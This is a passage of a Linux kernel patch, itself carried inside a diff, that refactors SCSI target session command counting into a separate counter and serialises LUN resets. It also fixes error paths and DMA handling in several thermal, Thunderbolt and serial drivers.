+@@ -4228,11 +4233,10 @@ static void iscsit_release_commands_from_conn(struct iscsit_conn *conn)
+ 				 */
+ 				list_move_tail(&cmd->i_conn_node,
+ 					       &conn->conn_cmd_list);
+-			} else {
+-				se_cmd->transport_state |= CMD_T_FABRIC_STOP;
+-			}
+-			spin_unlock_irq(&se_cmd->t_state_lock);
++		} else {
++			se_cmd->transport_state |= CMD_T_FABRIC_STOP;
+ 		}
++		spin_unlock_irq(&se_cmd->t_state_lock);
+ 	}
+ 	spin_unlock_bh(&conn->cmd_lock);
+ 
+@@ -4243,6 +4247,16 @@ static void iscsit_release_commands_from_conn(struct iscsit_conn *conn)
+ 		iscsit_free_cmd(cmd, true);
+ 
+ 	}
++
++	/*
++	 * Wait on commands that were cleaned up via the aborted_task path.
++	 * LLDs that implement iscsit_wait_conn will already have waited for
++	 * commands.
++	 */
++	if (!conn->conn_transport->iscsit_wait_conn) {
++		target_stop_cmd_counter(conn->cmd_cnt);
++		target_wait_for_cmds(conn->cmd_cnt);
++	}
+ }
+ 
+ static void iscsit_stop_timers_for_cmds(
+diff --git a/drivers/target/iscsi/iscsi_target_login.c b/drivers/target/iscsi/iscsi_target_login.c
+index 27e448c2d066c..274bdd7845ca9 100644
+--- a/drivers/target/iscsi/iscsi_target_login.c
++++ b/drivers/target/iscsi/iscsi_target_login.c
+@@ -1147,8 +1147,14 @@ static struct iscsit_conn *iscsit_alloc_conn(struct iscsi_np *np)
+ 		goto free_conn_cpumask;
+ 	}
+ 
++	conn->cmd_cnt = target_alloc_cmd_counter();
++	if (!conn->cmd_cnt)
++		goto free_conn_allowed_cpumask;
++
+ 	return conn;
+ 
++free_conn_allowed_cpumask:
++	free_cpumask_var(conn->allowed_cpumask);
+ free_conn_cpumask:
+ 	free_cpumask_var(conn->conn_cpumask);
+ free_conn_ops:
+@@ -1162,6 +1168,7 @@ free_conn:
+ 
+ void iscsit_free_conn(struct iscsit_conn *conn)
+ {
++	target_free_cmd_counter(conn->cmd_cnt);
+ 	free_cpumask_var(conn->allowed_cpumask);
+ 	free_cpumask_var(conn->conn_cpumask);
+ 	kfree(conn->conn_ops);
+diff --git a/drivers/target/target_core_device.c b/drivers/target/target_core_device.c
+index f6e58410ec3f9..aeb03136773d5 100644
+--- a/drivers/target/target_core_device.c
++++ b/drivers/target/target_core_device.c
+@@ -782,6 +782,7 @@ struct se_device *target_alloc_device(struct se_hba *hba, const char *name)
+ 	spin_lock_init(&dev->t10_alua.lba_map_lock);
+ 
+ 	INIT_WORK(&dev->delayed_cmd_work, target_do_delayed_work);
++	mutex_init(&dev->lun_reset_mutex);
+ 
+ 	dev->t10_wwn.t10_dev = dev;
+ 	/*
+diff --git a/drivers/target/target_core_internal.h b/drivers/target/target_core_internal.h
+index 38a6d08f75b34..85e35cf582e50 100644
+--- a/drivers/target/target_core_internal.h
++++ b/drivers/target/target_core_internal.h
+@@ -138,7 +138,6 @@ int	init_se_kmem_caches(void);
+ void	release_se_kmem_caches(void);
+ u32	scsi_get_new_index(scsi_index_t);
+ void	transport_subsystem_check_init(void);
+-void	transport_uninit_session(struct se_session *);
+ unsigned char *transport_dump_cmd_direction(struct se_cmd *);
+ void	transport_dump_dev_state(struct se_device *, char *, int *);
+ void	transport_dump_dev_info(struct se_device *, struct se_lun *,
+diff --git a/drivers/target/target_core_tmr.c b/drivers/target/target_core_tmr.c
+index 2b95b4550a637..4718db628222b 100644
+--- a/drivers/target/target_core_tmr.c
++++ b/drivers/target/target_core_tmr.c
+@@ -188,14 +188,23 @@ static void core_tmr_drain_tmr_list(
+ 	 * LUN_RESET tmr..
+ 	 */
+ 	spin_lock_irqsave(&dev->se_tmr_lock, flags);
+-	if (tmr)
+-		list_del_init(&tmr->tmr_list);
+ 	list_for_each_entry_safe(tmr_p, tmr_pp, &dev->dev_tmr_list, tmr_list) {
++		if (tmr_p == tmr)
++			continue;
++
+ 		cmd = tmr_p->task_cmd;
+ 		if (!cmd) {
+ 			pr_err("Unable to locate struct se_cmd for TMR\n");
+ 			continue;
+ 		}
++
++		/*
++		 * We only execute one LUN_RESET at a time so we can't wait
++		 * on them below.
++		 */
++		if (tmr_p->function == TMR_LUN_RESET)
++			continue;
++
+ 		/*
+ 		 * If this function was called with a valid pr_res_key
+ 		 * parameter (eg: for PROUT PREEMPT_AND_ABORT service action
+@@ -379,14 +388,25 @@ int core_tmr_lun_reset(
+ 				tmr_nacl->initiatorname);
+ 		}
+ 	}
++
++
++	/*
++	 * We only allow one reset or preempt and abort to execute at a time
++	 * to prevent one call from claiming all the cmds causing a second
++	 * call from returning while cmds it should have waited on are still
++	 * running.
++	 */
++	mutex_lock(&dev->lun_reset_mutex);
++
+ 	pr_debug("LUN_RESET: %s starting for [%s], tas: %d\n",
+ 		(preempt_and_abort_list) ? "Preempt" : "TMR",
+ 		dev->transport->name, tas);
+-
+ 	core_tmr_drain_tmr_list(dev, tmr, preempt_and_abort_list);
+ 	core_tmr_drain_state_list(dev, prout_cmd, tmr_sess, tas,
+ 				preempt_and_abort_list);
+ 
++	mutex_unlock(&dev->lun_reset_mutex);
++
+ 	/*
+ 	 * Clear any legacy SPC-2 reservation when called during
+ 	 * LOGICAL UNIT RESET
+diff --git a/drivers/target/target_core_tpg.c b/drivers/target/target_core_tpg.c
+index 736847c933e5c..8ebccdbd94f0e 100644
+--- a/drivers/target/target_core_tpg.c
++++ b/drivers/target/target_core_tpg.c
+@@ -328,7 +328,7 @@ static void target_shutdown_sessions(struct se_node_acl *acl)
+ restart:
+ 	spin_lock_irqsave(&acl->nacl_sess_lock, flags);
+ 	list_for_each_entry(sess, &acl->acl_sess_list, sess_acl_list) {
+-		if (atomic_read(&sess->stopped))
++		if (sess->cmd_cnt && atomic_read(&sess->cmd_cnt->stopped))
+ 			continue;
+ 
+ 		list_del_init(&sess->sess_acl_list);
+diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c
+index 5926316252eb9..86adff2a86edd 100644
+--- a/drivers/target/target_core_transport.c
++++ b/drivers/target/target_core_transport.c
+@@ -220,12 +220,52 @@ void transport_subsystem_check_init(void)
+ 	sub_api_initialized = 1;
+ }
+ 
+-static void target_release_sess_cmd_refcnt(struct percpu_ref *ref)
++static void target_release_cmd_refcnt(struct percpu_ref *ref)
+ {
+-	struct se_session *sess = container_of(ref, typeof(*sess), cmd_count);
++	struct target_cmd_counter *cmd_cnt  = container_of(ref,
++							   typeof(*cmd_cnt),
++							   refcnt);
++	wake_up(&cmd_cnt->refcnt_wq);
++}
++
++struct target_cmd_counter *target_alloc_cmd_counter(void)
++{
++	struct target_cmd_counter *cmd_cnt;
++	int rc;
++
++	cmd_cnt = kzalloc(sizeof(*cmd_cnt), GFP_KERNEL);
++	if (!cmd_cnt)
++		return NULL;
++
++	init_completion(&cmd_cnt->stop_done);
++	init_waitqueue_head(&cmd_cnt->refcnt_wq);
++	atomic_set(&cmd_cnt->stopped, 0);
+ 
+-	wake_up(&sess->cmd_count_wq);
++	rc = percpu_ref_init(&cmd_cnt->refcnt, target_release_cmd_refcnt, 0,
++			     GFP_KERNEL);
++	if (rc)
++		goto free_cmd_cnt;
++
++	return cmd_cnt;
++
++free_cmd_cnt:
++	kfree(cmd_cnt);
++	return NULL;
+ }
++EXPORT_SYMBOL_GPL(target_alloc_cmd_counter);
++
++void target_free_cmd_counter(struct target_cmd_counter *cmd_cnt)
++{
++	/*
++	 * Drivers like loop do not call target_stop_session during session
++	 * shutdown so we have to drop the ref taken at init time here.
++	 */
++	if (!atomic_read(&cmd_cnt->stopped))
++		percpu_ref_put(&cmd_cnt->refcnt);
++
++	percpu_ref_exit(&cmd_cnt->refcnt);
++}
++EXPORT_SYMBOL_GPL(target_free_cmd_counter);
+ 
+ /**
+  * transport_init_session - initialize a session object
+@@ -233,32 +273,14 @@ static void target_release_sess_cmd_refcnt(struct percpu_ref *ref)
+  *
+  * The caller must have zero-initialized @se_sess before calling this function.
+  */
+-int transport_init_session(struct se_session *se_sess)
++void transport_init_session(struct se_session *se_sess)
+ {
+ 	INIT_LIST_HEAD(&se_sess->sess_list);
+ 	INIT_LIST_HEAD(&se_sess->sess_acl_list);
+ 	spin_lock_init(&se_sess->sess_cmd_lock);
+-	init_waitqueue_head(&se_sess->cmd_count_wq);
+-	init_completion(&se_sess->stop_done);
+-	atomic_set(&se_sess->stopped, 0);
+-	return percpu_ref_init(&se_sess->cmd_count,
+-			       target_release_sess_cmd_refcnt, 0, GFP_KERNEL);
+ }
+ EXPORT_SYMBOL(transport_init_session);
+ 
+-void transport_uninit_session(struct se_session *se_sess)
+-{
+-	/*
+-	 * Drivers like iscsi and loop do not call target_stop_session
+-	 * during session shutdown so we have to drop the ref taken at init
+-	 * time here.
+-	 */
+-	if (!atomic_read(&se_sess->stopped))
+-		percpu_ref_put(&se_sess->cmd_count);
+-
+-	percpu_ref_exit(&se_sess->cmd_count);
+-}
+-
+ /**
+  * transport_alloc_session - allocate a session object and initialize it
+  * @sup_prot_ops: bitmask that defines which T10-PI modes are supported.
+@@ -266,7 +288,6 @@ void transport_uninit_session(struct se_session *se_sess)
+ struct se_session *transport_alloc_session(enum target_prot_op sup_prot_ops)
+ {
+ 	struct se_session *se_sess;
+-	int ret;
+ 
+ 	se_sess = kmem_cache_zalloc(se_sess_cache, GFP_KERNEL);
+ 	if (!se_sess) {
+@@ -274,11 +295,7 @@ struct se_session *transport_alloc_session(enum target_prot_op sup_prot_ops)
+ 				" se_sess_cache\n");
+ 		return ERR_PTR(-ENOMEM);
+ 	}
+-	ret = transport_init_session(se_sess);
+-	if (ret < 0) {
+-		kmem_cache_free(se_sess_cache, se_sess);
+-		return ERR_PTR(ret);
+-	}
++	transport_init_session(se_sess);
+ 	se_sess->sup_prot_ops = sup_prot_ops;
+ 
+ 	return se_sess;
+@@ -444,8 +461,13 @@ target_setup_session(struct se_portal_group *tpg,
+ 		     int (*callback)(struct se_portal_group *,
+ 				     struct se_session *, void *))
+ {
++	struct target_cmd_counter *cmd_cnt;
+ 	struct se_session *sess;
++	int rc;
+ 
++	cmd_cnt = target_alloc_cmd_counter();
++	if (!cmd_cnt)
++		return ERR_PTR(-ENOMEM);
+ 	/*
+ 	 * If the fabric driver is using percpu-ida based pre allocation
+ 	 * of I/O descriptor tags, go ahead and perform that setup now..
+@@ -455,29 +477,36 @@ target_setup_session(struct se_portal_group *tpg,
+ 	else
+ 		sess = transport_alloc_session(prot_op);
+ 
+-	if (IS_ERR(sess))
+-		return sess;
++	if (IS_ERR(sess)) {
++		rc = PTR_ERR(sess);
++		goto free_cnt;
++	}
++	sess->cmd_cnt = cmd_cnt;
+ 
+ 	sess->se_node_acl = core_tpg_check_initiator_node_acl(tpg,
+ 					(unsigned char *)initiatorname);
+ 	if (!sess->se_node_acl) {
+-		transport_free_session(sess);
+-		return ERR_PTR(-EACCES);
++		rc = -EACCES;
++		goto free_sess;
+ 	}
+ 	/*
+ 	 * Go ahead and perform any remaining fabric setup that is
+ 	 * required before transport_register_session().
+ 	 */
+ 	if (callback != NULL) {
+-		int rc = callback(tpg, sess, private);
+-		if (rc) {
+-			transport_free_session(sess);
+-			return ERR_PTR(rc);
+-		}
++		rc = callback(tpg, sess, private);
++		if (rc)
++			goto free_sess;
+ 	}
+ 
+ 	transport_register_session(tpg, sess->se_node_acl, sess, private);
+ 	return sess;
++
++free_sess:
++	transport_free_session(sess);
++free_cnt:
++	target_free_cmd_counter(cmd_cnt);
++	return ERR_PTR(rc);
+ }
+ EXPORT_SYMBOL(target_setup_session);
+ 
+@@ -602,7 +631,8 @@ void transport_free_session(struct se_session *se_sess)
+ 		sbitmap_queue_free(&se_sess->sess_tag_pool);
+ 		kvfree(se_sess->sess_cmd_map);
+ 	}
+-	transport_uninit_session(se_sess);
++	if (se_sess->cmd_cnt)
++		target_free_cmd_counter(se_sess->cmd_cnt);
+ 	kmem_cache_free(se_sess_cache, se_sess);
+ }
+ EXPORT_SYMBOL(transport_free_session);
+@@ -1412,14 +1442,12 @@ target_cmd_size_check(struct se_cmd *cmd, unsigned int size)
+  *
+  * Preserves the value of @cmd->tag.
+  */
+-void __target_init_cmd(
+-	struct se_cmd *cmd,
+-	const struct target_core_fabric_ops *tfo,
+-	struct se_session *se_sess,
+-	u32 data_length,
+-	int data_direction,
+-	int task_attr,
+-	unsigned char *sense_buffer, u64 unpacked_lun)
++void __target_init_cmd(struct se_cmd *cmd,
++		       const struct target_core_fabric_ops *tfo,
++		       struct se_session *se_sess, u32 data_length,
++		       int data_direction, int task_attr,
++		       unsigned char *sense_buffer, u64 unpacked_lun,
++		       struct target_cmd_counter *cmd_cnt)
+ {
+ 	INIT_LIST_HEAD(&cmd->se_delayed_node);
+ 	INIT_LIST_HEAD(&cmd->se_qf_node);
+@@ -1439,6 +1467,7 @@ void __target_init_cmd(
+ 	cmd->sam_task_attr = task_attr;
+ 	cmd->sense_buffer = sense_buffer;
+ 	cmd->orig_fe_lun = unpacked_lun;
++	cmd->cmd_cnt = cmd_cnt;
+ 
+ 	if (!(cmd->se_cmd_flags & SCF_USE_CPUID))
+ 		cmd->cpuid = raw_smp_processor_id();
+@@ -1658,7 +1687,8 @@ int target_init_cmd(struct se_cmd *se_cmd, struct se_session *se_sess,
+ 	 * target_core_fabric_ops->queue_status() callback
+ 	 */
+ 	__target_init_cmd(se_cmd, se_tpg->se_tpg_tfo, se_sess, data_length,
+-			  data_dir, task_attr, sense, unpacked_lun);
++			  data_dir, task_attr, sense, unpacked_lun,
++			  se_sess->cmd_cnt);
+ 
+ 	/*
+ 	 * Obtain struct se_cmd->cmd_kref reference. A second kref_get here is
+@@ -1953,7 +1983,8 @@ int target_submit_tmr(struct se_cmd *se_cmd, struct se_session *se_sess,
+ 	BUG_ON(!se_tpg);
+ 
+ 	__target_init_cmd(se_cmd, se_tpg->se_tpg_tfo, se_sess,
+-			  0, DMA_NONE, TCM_SIMPLE_TAG, sense, unpacked_lun);
++			  0, DMA_NONE, TCM_SIMPLE_TAG, sense, unpacked_lun,
++			  se_sess->cmd_cnt);
+ 	/*
+ 	 * FIXME: Currently expect caller to handle se_cmd->se_tmr_req
+ 	 * allocation failure.
+@@ -2957,7 +2988,6 @@ EXPORT_SYMBOL(transport_generic_free_cmd);
+  */
+ int target_get_sess_cmd(struct se_cmd *se_cmd, bool ack_kref)
+ {
+-	struct se_session *se_sess = se_cmd->se_sess;
+ 	int ret = 0;
+ 
+ 	/*
+@@ -2970,9 +3000,14 @@ int target_get_sess_cmd(struct se_cmd *se_cmd, bool ack_kref)
+ 		se_cmd->se_cmd_flags |= SCF_ACK_KREF;
+ 	}
+ 
+-	if (!percpu_ref_tryget_live(&se_sess->cmd_count))
+-		ret = -ESHUTDOWN;
+-
++	/*
++	 * Users like xcopy do not use counters since they never do a stop
++	 * and wait.
++	 */
++	if (se_cmd->cmd_cnt) {
++		if (!percpu_ref_tryget_live(&se_cmd->cmd_cnt->refcnt))
++			ret = -ESHUTDOWN;
++	}
+ 	if (ret && ack_kref)
+ 		target_put_sess_cmd(se_cmd);
+ 
+@@ -2993,7 +3028,7 @@ static void target_free_cmd_mem(struct se_cmd *cmd)
+ static void target_release_cmd_kref(struct kref *kref)
+ {
+ 	struct se_cmd *se_cmd = container_of(kref, struct se_cmd, cmd_kref);
+-	struct se_session *se_sess = se_cmd->se_sess;
++	struct target_cmd_counter *cmd_cnt = se_cmd->cmd_cnt;
+ 	struct completion *free_compl = se_cmd->free_compl;
+ 	struct completion *abrt_compl = se_cmd->abrt_compl;
+ 
+@@ -3004,7 +3039,8 @@ static void target_release_cmd_kref(struct kref *kref)
+ 	if (abrt_compl)
+ 		complete(abrt_compl);
+ 
+-	percpu_ref_put(&se_sess->cmd_count);
++	if (cmd_cnt)
++		percpu_ref_put(&cmd_cnt->refcnt);
+ }
+ 
+ /**
+@@ -3123,46 +3159,67 @@ void target_show_cmd(const char *pfx, struct se_cmd *cmd)
+ }
+ EXPORT_SYMBOL(target_show_cmd);
+ 
+-static void target_stop_session_confirm(struct percpu_ref *ref)
++static void target_stop_cmd_counter_confirm(struct percpu_ref *ref)
++{
++	struct target_cmd_counter *cmd_cnt = container_of(ref,
++						struct target_cmd_counter,
++						refcnt);
++	complete_all(&cmd_cnt->stop_done);
++}
++
++/**
++ * target_stop_cmd_counter - Stop new IO from being added to the counter.
++ * @cmd_cnt: counter to stop
++ */
++void target_stop_cmd_counter(struct target_cmd_counter *cmd_cnt)
+ {
+-	struct se_session *se_sess = container_of(ref, struct se_session,
+-						  cmd_count);
+-	complete_all(&se_sess->stop_done);
++	pr_debug("Stopping command counter.\n");
++	if (!atomic_cmpxchg(&cmd_cnt->stopped, 0, 1))
++		percpu_ref_kill_and_confirm(&cmd_cnt->refcnt,
++					    target_stop_cmd_counter_confirm);
+ }
++EXPORT_SYMBOL_GPL(target_stop_cmd_counter);
+ 
+ /**
+  * target_stop_session - Stop new IO from being queued on the session.
+- * @se_sess:    session to stop
++ * @se_sess: session to stop
+  */
+ void target_stop_session(struct se_session *se_sess)
+ {
+-	pr_debug("Stopping session queue.\n");
+-	if (atomic_cmpxchg(&se_sess->stopped, 0, 1) == 0)
+-		percpu_ref_kill_and_confirm(&se_sess->cmd_count,
+-					    target_stop_session_confirm);
++	target_stop_cmd_counter(se_sess->cmd_cnt);
+ }
+ EXPORT_SYMBOL(target_stop_session);
+ 
+ /**
+- * target_wait_for_sess_cmds - Wait for outstanding commands
+- * @se_sess:    session to wait for active I/O
++ * target_wait_for_cmds - Wait for outstanding cmds.
++ * @cmd_cnt: counter to wait for active I/O for.
+  */
+-void target_wait_for_sess_cmds(struct se_session *se_sess)
++void target_wait_for_cmds(struct target_cmd_counter *cmd_cnt)
+ {
+ 	int ret;
+ 
+-	WARN_ON_ONCE(!atomic_read(&se_sess->stopped));
++	WARN_ON_ONCE(!atomic_read(&cmd_cnt->stopped));
+ 
+ 	do {
+ 		pr_debug("Waiting for running cmds to complete.\n");
+-		ret = wait_event_timeout(se_sess->cmd_count_wq,
+-				percpu_ref_is_zero(&se_sess->cmd_count),
+-				180 * HZ);
++		ret = wait_event_timeout(cmd_cnt->refcnt_wq,
++					 percpu_ref_is_zero(&cmd_cnt->refcnt),
++					 180 * HZ);
+ 	} while (ret <= 0);
+ 
+-	wait_for_completion(&se_sess->stop_done);
++	wait_for_completion(&cmd_cnt->stop_done);
+ 	pr_debug("Waiting for cmds done.\n");
+ }
++EXPORT_SYMBOL_GPL(target_wait_for_cmds);
++
++/**
++ * target_wait_for_sess_cmds - Wait for outstanding commands
++ * @se_sess: session to wait for active I/O
++ */
++void target_wait_for_sess_cmds(struct se_session *se_sess)
++{
++	target_wait_for_cmds(se_sess->cmd_cnt);
++}
+ EXPORT_SYMBOL(target_wait_for_sess_cmds);
+ 
+ /*
+diff --git a/drivers/target/target_core_xcopy.c b/drivers/target/target_core_xcopy.c
+index 49eaee022ef1d..91ed015b588c6 100644
+--- a/drivers/target/target_core_xcopy.c
++++ b/drivers/target/target_core_xcopy.c
+@@ -461,8 +461,6 @@ static const struct target_core_fabric_ops xcopy_pt_tfo = {
+ 
+ int target_xcopy_setup_pt(void)
+ {
+-	int ret;
+-
+ 	xcopy_wq = alloc_workqueue("xcopy_wq", WQ_MEM_RECLAIM, 0);
+ 	if (!xcopy_wq) {
+ 		pr_err("Unable to allocate xcopy_wq\n");
+@@ -479,9 +477,7 @@ int target_xcopy_setup_pt(void)
+ 	INIT_LIST_HEAD(&xcopy_pt_nacl.acl_list);
+ 	INIT_LIST_HEAD(&xcopy_pt_nacl.acl_sess_list);
+ 	memset(&xcopy_pt_sess, 0, sizeof(struct se_session));
+-	ret = transport_init_session(&xcopy_pt_sess);
+-	if (ret < 0)
+-		goto destroy_wq;
++	transport_init_session(&xcopy_pt_sess);
+ 
+ 	xcopy_pt_nacl.se_tpg = &xcopy_pt_tpg;
+ 	xcopy_pt_nacl.nacl_sess = &xcopy_pt_sess;
+@@ -490,19 +486,12 @@ int target_xcopy_setup_pt(void)
+ 	xcopy_pt_sess.se_node_acl = &xcopy_pt_nacl;
+ 
+ 	return 0;
+-
+-destroy_wq:
+-	destroy_workqueue(xcopy_wq);
+-	xcopy_wq = NULL;
+-	return ret;
+ }
+ 
+ void target_xcopy_release_pt(void)
+ {
+-	if (xcopy_wq) {
++	if (xcopy_wq)
+ 		destroy_workqueue(xcopy_wq);
+-		transport_uninit_session(&xcopy_pt_sess);
+-	}
+ }
+ 
+ /*
+@@ -602,8 +591,8 @@ static int target_xcopy_read_source(
+ 		(unsigned long long)src_lba, transfer_length_block, src_bytes);
+ 
+ 	__target_init_cmd(se_cmd, &xcopy_pt_tfo, &xcopy_pt_sess, src_bytes,
+-			  DMA_FROM_DEVICE, 0, &xpt_cmd.sense_buffer[0], 0);
+-
++			  DMA_FROM_DEVICE, 0, &xpt_cmd.sense_buffer[0], 0,
++			  NULL);
+ 	rc = target_xcopy_setup_pt_cmd(&xpt_cmd, xop, src_dev, &cdb[0],
+ 				remote_port);
+ 	if (rc < 0) {
+@@ -647,8 +636,8 @@ static int target_xcopy_write_destination(
+ 		(unsigned long long)dst_lba, transfer_length_block, dst_bytes);
+ 
+ 	__target_init_cmd(se_cmd, &xcopy_pt_tfo, &xcopy_pt_sess, dst_bytes,
+-			  DMA_TO_DEVICE, 0, &xpt_cmd.sense_buffer[0], 0);
+-
++			  DMA_TO_DEVICE, 0, &xpt_cmd.sense_buffer[0], 0,
++			  NULL);
+ 	rc = target_xcopy_setup_pt_cmd(&xpt_cmd, xop, dst_dev, &cdb[0],
+ 				remote_port);
+ 	if (rc < 0) {
+diff --git a/drivers/thermal/mtk_thermal.c b/drivers/thermal/mtk_thermal.c
+index 8440692e3890d..62f1e691659e3 100644
+--- a/drivers/thermal/mtk_thermal.c
++++ b/drivers/thermal/mtk_thermal.c
+@@ -1028,7 +1028,12 @@ static int mtk_thermal_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
+-	auxadc_base = of_iomap(auxadc, 0);
++	auxadc_base = devm_of_iomap(&pdev->dev, auxadc, 0, NULL);
++	if (IS_ERR(auxadc_base)) {
++		of_node_put(auxadc);
++		return PTR_ERR(auxadc_base);
++	}
++
+ 	auxadc_phys_base = of_get_phys_base(auxadc);
+ 
+ 	of_node_put(auxadc);
+@@ -1044,7 +1049,12 @@ static int mtk_thermal_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
+-	apmixed_base = of_iomap(apmixedsys, 0);
++	apmixed_base = devm_of_iomap(&pdev->dev, apmixedsys, 0, NULL);
++	if (IS_ERR(apmixed_base)) {
++		of_node_put(apmixedsys);
++		return PTR_ERR(apmixed_base);
++	}
++
+ 	apmixed_phys_base = of_get_phys_base(apmixedsys);
+ 
+ 	of_node_put(apmixedsys);
+diff --git a/drivers/thunderbolt/tb.h b/drivers/thunderbolt/tb.h
+index f034723b1b40e..f79cae48a8eab 100644
+--- a/drivers/thunderbolt/tb.h
++++ b/drivers/thunderbolt/tb.h
+@@ -1058,7 +1058,7 @@ void tb_port_lane_bonding_disable(struct tb_port *port);
+ int tb_port_wait_for_link_width(struct tb_port *port, int width,
+ 				int timeout_msec);
+ int tb_port_update_credits(struct tb_port *port);
+-bool tb_port_is_clx_enabled(struct tb_port *port, enum tb_clx clx);
++bool tb_port_is_clx_enabled(struct tb_port *port, unsigned int clx);
+ 
+ int tb_switch_find_vse_cap(struct tb_switch *sw, enum tb_switch_vse_cap vsec);
+ int tb_switch_find_cap(struct tb_switch *sw, enum tb_switch_cap cap);
+diff --git a/drivers/tty/serial/8250/8250.h b/drivers/tty/serial/8250/8250.h
+index 287153d325365..1e8fe44a7099f 100644
+--- a/drivers/tty/serial/8250/8250.h
++++ b/drivers/tty/serial/8250/8250.h
+@@ -365,6 +365,13 @@ static inline void serial8250_do_prepare_rx_dma(struct uart_8250_port *p)
+ 	if (dma->prepare_rx_dma)
+ 		dma->prepare_rx_dma(p);
+ }
++
++static inline bool serial8250_tx_dma_running(struct uart_8250_port *p)
++{
++	struct uart_8250_dma *dma = p->dma;
++
++	return dma && dma->tx_running;
++}
+ #else
+ static inline int serial8250_tx_dma(struct uart_8250_port *p)
+ {
+@@ -380,6 +387,11 @@ static inline int serial8250_request_dma(struct uart_8250_port *p)
+ 	return -1;
+ }
+ static inline void serial8250_release_dma(struct uart_8250_port *p) { }
++
++static inline bool serial8250_tx_dma_running(struct uart_8250_port *p)
++{
++	return false;
++}
+ #endif
+ 
+ static inline int ns16550a_goto_highspeed(struct uart_8250_port *up)
+diff --git a/drivers/tty/serial/8250/8250_bcm7271.c b/drivers/tty/serial/8250/8250_bcm7271.c
+index ed5a947476920..f801b1f5b46c0 100644
+--- a/drivers/tty/serial/8250/8250_bcm7271.c
++++ b/drivers/tty/serial/8250/8250_bcm7271.c
+@@ -1014,14 +1014,16 @@ static int brcmuart_probe(struct platform_device *pdev)
+ 	/* See if a Baud clock has been specified */
+ 	baud_mux_clk = of_clk_get_by_name(np, "sw_baud");
+ 	if (IS_ERR(baud_mux_clk)) {
+-		if (PTR_ERR(baud_mux_clk) == -EPROBE_DEFER)
+-			return -EPROBE_DEFER;
++		if (PTR_ERR(baud_mux_clk) == -EPROBE_DEFER) {
++			ret = -EPROBE_DEFER;
++			goto release_dma;
++		}
+ 		dev_dbg(dev, "BAUD MUX clock not specified\n");
+ 	} else {
+ 		dev_dbg(dev, "BAUD MUX clock found\n");
+ 		ret = clk_prepare_enable(baud_mux_clk);
+ 		if (ret)
+-			return ret;
++			goto release_dma;
+ 		priv->baud_mux_clk = baud_mux_clk;
+ 		init_real_clk_rates(dev, priv);
+ 		clk_rate = priv->default_mux_rate;
+@@ -1029,7 +1031,8 @@ static int brcmuart_probe(struct platform_device *pdev)
+ 
+ 	if (clk_rate == 0) {
+ 		dev_err(dev, "clock-frequency or clk not defined\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto release_dma;
+ 	}
+ 
+ 	dev_dbg(dev, "DMA is %senabled\n", priv->dma_enabled ? "" : "not ");
+@@ -1116,7 +1119,9 @@ err1:
+ 	serial8250_unregister_port(priv->line);
+ err:
+ 	brcmuart_free_bufs(dev, priv);
+-	brcmuart_arbitration(priv, 0);
++release_dma:
++	if (priv->dma_enabled)
++		brcmuart_arbitration(priv, 0);
+ 	return ret;
+ }
+ 
+@@ -1128,7 +1133,8 @@ static int brcmuart_remove(struct platform_device *pdev)
+ 	hrtimer_cancel(&priv->hrt);
+ 	serial8250_unregister_port(priv->line);
+ 	brcmuart_free_bufs(&pdev->dev, priv);
+-	brcmuart_arbitration(priv, 0);
++	if (priv->dma_enabled)
++		brcmuart_arbitration(priv, 0);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/tty/serial/8250/8250_port.c b/drivers/tty/serial/8250/8250_port.c
+index d006467ec7843..fa220620511e5 100644
+--- a/drivers/tty/serial/8250/8250_port.c
++++ b/drivers/tty/serial/8250/8250_port.c
+@@ -15,6 +15,7 @@
+ #include <linux/moduleparam.h>
+ #include <linux/ioport.h>
+ #include <linux/init.h>
++#include <linux/irq.h>
+ #include <linux/console.h>
+ #include <linux/gpio/consumer.h>
+ #include <linux/sysrq.h>
+@@ -1925,6 +1926,7 @@ static bool handle_rx_dma(struct uart_8250_port *up, unsigned int iir)
+ int serial8250_handle_irq(struct uart_port *port, unsigned int iir)
+ {
+ 	struct uart_8250_port *up = up_to_u8250p(port);
++	struct tty_port *tport = &port->state->port;
+ 	bool skip_rx = false;
+ 	unsigned long flags;
+ 	u16 status;
+@@ -1950,6 +1952,8 @@ int serial8250_handle_irq(struct uart_port *port, unsigned int iir)
+ 		skip_rx = true;
+ 
+ 	if (status & (UART_LSR_DR | UART_LSR_BI) && !skip_rx) {
++		if (irqd_is_wakeup_set(irq_get_irq_data(port->irq)))
++			pm_wakeup_event(tport->tty->dev, 0);
+ 		if (!up->dma || handle_rx_dma(up, iir))
+ 			status = serial8250_rx_chars(up, status);
+ 	}
+@@ -2009,18 +2013,19 @@ static int serial8250_tx_threshold_handle_irq(struct uart_port *port)
+ static unsigned int serial8250_tx_empty(struct uart_port *port)
+ {
+ 	struct uart_8250_port *up = up_to_u8250p(port);
++	unsigned int result = 0;
+ 	unsigned long flags;
+-	u16 lsr;
+ 
+ 	serial8250_rpm_get(up);
+ 
+ 	spin_lock_irqsave(&port->lock, flags);
+-	lsr = serial_lsr_in(up);
++	if (!serial8250_tx_dma_running(up) && uart_lsr_tx_empty(serial_lsr_in(up)))
++		result = TIOCSER_TEMT;
+ 	spin_unlock_irqrestore(&port->lock, flags);
+ 
+ 	serial8250_rpm_put(up);
+ 
+-	return uart_lsr_tx_empty(lsr) ? TIOCSER_TEMT : 0;
++	return result;
+ }
+ 
+ unsigned int serial8250_do_get_mctrl(struct uart_port *port)
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 59c10bceebbef..29b50a0792dcf 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1270,7 +1270,7 @@ static inline int lpuart_start_rx_dma(struct lpuart_port *sport)
+ 	 * 10ms at any baud rate.
+ 	 */
+ 	sport->rx_dma_rng_buf_len = (DMA_RX_TIMEOUT * baud /  bits / 1000) * 2;
+-	sport->rx_dma_rng_buf_len = (1 << (fls(sport->rx_dma_rng_buf_len) - 1));
++	sport->rx_dma_rng_buf_len = (1 << fls(sport->rx_dma_rng_buf_len));
+ 	if (sport->rx_dma_rng_buf_len < 16)
+ 		sport->rx_dma_rng_buf_len = 16;
+ 
+diff --git a/drivers/tty/serial/max310x.c b/drivers/tty/serial/max310x.c
+index 4eb24e3407f80..9ec39edf56b81 100644
